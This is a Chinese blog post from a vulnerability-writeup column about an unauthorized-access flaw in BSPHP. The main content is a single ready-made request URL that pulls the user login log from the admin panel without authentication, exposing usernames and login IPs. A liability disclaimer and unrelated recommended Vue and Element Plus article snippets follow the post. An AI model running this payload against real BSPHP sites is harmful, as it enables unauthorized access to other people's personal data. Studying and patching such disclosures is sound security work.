BSPHP 未授权访问 信息泄露

最新推荐文章于 2025-04-10 00:02:01 发布
最新推荐文章于 2025-04-10 00:02:01 发布
阅读量6k 收藏 4
点赞数 3
分类专栏: 0.漏洞文库 文章标签: laravel php 渗透测试 web安全 红队攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48899364/article/details/133828619
版权

漏洞描述

BSPHP 存在未授权访问 泄露用户 IP 和 账户名信息

漏洞复现

访问url:

构造payload访问:

/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0%E2%80%98

泄露用户名与登录IP:
在这里插入图片描述
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文

了解本专栏 订阅专栏 解锁全文 超级会员免费看
16、springboot3 vue3开发平台-前端-自定义tabs
qq_51355375的博客
08-19 822
使用el-tabs时因为内容是放到el-tab-pane中, 当标签多时会出现加载慢,卡问题,还有就是集成一些第三方封装的组件,如视频组件时会出项html样式冲突失控问题,所以使用自定义组件,将路由tabs分开,减少影响。
学习vue3中遇到的问题及知识总结(持续更新状态)
m0_68384650的博客
03-10 989
1.pinia持久化插件使用的地址问题一在安装依赖时容易停留在idealTree:vue3-pinia-demo: sill idealTree buildDeps进度条卡住方法:请按照以下步骤:删除 C:\Users账户中的 .npmrc 文件在命令提示符里执行 npm cache verify在命令提示符里执行 npm config set registry https://registry.npmmirror.com 切换淘宝源之后再次执行 npm i 即可。2.包管理器的升级。
vue tab切换_vue路由跳转实现tab选项卡
weixin_39887546的博客
12-12 1364
现在很多的后台管理系统都采用tab选项卡的布局,左边是导航栏固定,右边是对应的页面,每次点击左边的导航标题,只有右面的对应页面再进行切换,而vue要做tab选项卡,推荐使用实现a标签的效果,然后使用实现插槽的效果,把对应的页面 "塞" 进去,具体实现看下面的案例:这是tab选项卡的效果,布局就不多说了,主要是{{a.title}},其中to是指向你要跳转的路径,这是关键,而就是最终其他子...
Vue3 结合 Element Plus Vue Router 的完整安装配置及使用详解
最新发布
爱的叹息的专栏
04-10 823
Vue3 结合 Element Plus Vue Router 的完整安装配置及使用详解
vue-router实现选项卡
ikceo1211的博客
11-24 2080
    初学vue,使用vue-router实现选项卡,效果图如下:             思路为使用<router-view><router-link>来实现,顶部tab切换为一个模板,内容为一个模板。话不多说,直接撸代码: 第一步:创建几个模板,一个为顶部导航tabbar模板 top_view,其他几个为展示内容页模板: 第二步:确保你的项目已经使...
elementPlus | el-tabs 标签管理路由页面
weixin_42479421的博客
10-29 1715
elementplus中el-tabs 管理路由
Vue.js路由实现选项卡简单实例
10-16
主要为大家详细介绍了Vue.js路由实现选项卡简单实例,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
vue3 element-plus的后台管理
01-11
### 使用 Vue3 Element Plus 构建后台管理系统 #### 项目初始化与环境搭建 为了创建一个基于 Vue3 Element Plus 的后台管理系统,首先需要安装必要的依赖项并设置开发环境。这可以通过 Vue CLI 或 Vite 来...
帮我写一个vue2+ElementUI的文件,用于个人门户网站首页。主题是前端相关技术栈,有HTML5、JavaScript、CSS、vue3全家桶、elementUI-plus。网页呈左右布局,左边menu组件负责切换内容,右边具体的内容。内容越丰富越好。
03-12
不过ElementUI-PlusElement Plus,专为Vue3设计,所以在Vue2中使用可能会有问题。这里可能需要提示用户,或者改用ElementUI的普通版本,或者考虑升级到Vue3。但用户明确要求Vue2,所以可能需要调整,使用ElementUI...
vue 项目情景应用+深度理解+面试高频题(持续更新中)
m0_51244077的博客
10-27 1127
vue 项目情景应用+逻辑业务理解
vue项目——路由实现选项卡简单实例
qq506930427的博客
12-10 1234
【转】https://blog.csdn.net/Denglishang/article/details/80829461 需要实现下图效果,点击上方选项卡,切换到不同内容的组件:   事先准备好两个库文件(vue.js、vue-router.js),放到对应路径。 1.引入依赖库 <script src="vue.js" type="text/javascript" ch...
vue3项目中 路由elementPlus当中的标签页结合封装
lzz20010903的博客
05-29 748
在项目当中大家应该都有看到过,像标签页一样的面包屑吧,接下来我为大家介绍一下,主要组成部分:路由+组件库的标签页。ok就这么easy!它实现的方法也不难哦。ok啦,今天就分享到这里吧,加油!
vue3.0+ts+element-plus多页签应用模板:vue-routervuex
m0_46172278的博客
03-24 2621
目录系列链接一、目录结构二、安装vue-router三、安装vuex四、改写main.ts五、篇章小结 系列链接 第一章——vue3.0+ts+element-plus多页签应用模板:项目搭建篇 第二章——vue3.0+ts+element-plus多页签应用模板:安装vue-routervuex篇 一、目录结构 现在,你的目录结构应该是这样的 (忽略node_modules): ├── config # 配置文件 | ├── dev.config.js
ElementPlus 标签路由的组合使用
weixin_71645445的博客
04-07 1771
以下为Tab.vue 思路就是标签页的组件记录路由的path 被选中就将对应的path push到路由器里 将<RouteView/>的内容替换。目标:左侧导航区 右侧为展示区 点击导航区的某一项 右侧会新建一个标签页 展示内容 标签页之间可以点击切换 可以关闭除首页的其他标签页。以下为route/index.ts。
ElementPlus卡片如何能够一行呈四,黑马UI前端布局视频资料,element样式具体的细节无法修改,F12找到那个位置,可能在其他组件写了错误,找到那个位置,围绕着位置解决问题最快了,卡片下边
weixin_54048131的博客
04-09 1111
【代码】ElementPlus卡片如何能够一行呈现四个,黑马UI前端布局视频资料,element样式具体的细节无法修改,F12找到那个位置,可能是在其他组件写了错误,找到那个位置,围绕着那个位置解决问题最快了。
elementPlus之home页面布局
村长在路上
11-25 667
现在 header 部分 Aside 部分 Main部分 加上背景色以及命名。可以根据自己喜欢的格式选择。
element-plus教程:Layout 布局
红衣大叔
11-23 1832
在这个示例中,根据屏幕宽度的不同,每列占据的栅格数会自动调整,从而实现响应式布局。Element Plus允许你在同一行内创建任意组合的混合布局。间隔值是一个数字,表示栅格之间的间距(以像素为单位)。首先,确保你已经在项目中安装了Element Plus,并在。在Element Plus中,Layout布局主要通过。中引入了Element Plus及其样式。,分别对应不同的屏幕宽度范围。属性的值,即可灵活地控制每列占据的栅格数。组件之间是没有间隔的,但你可以通过给。组件添加这些属性来实现响应式布局。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值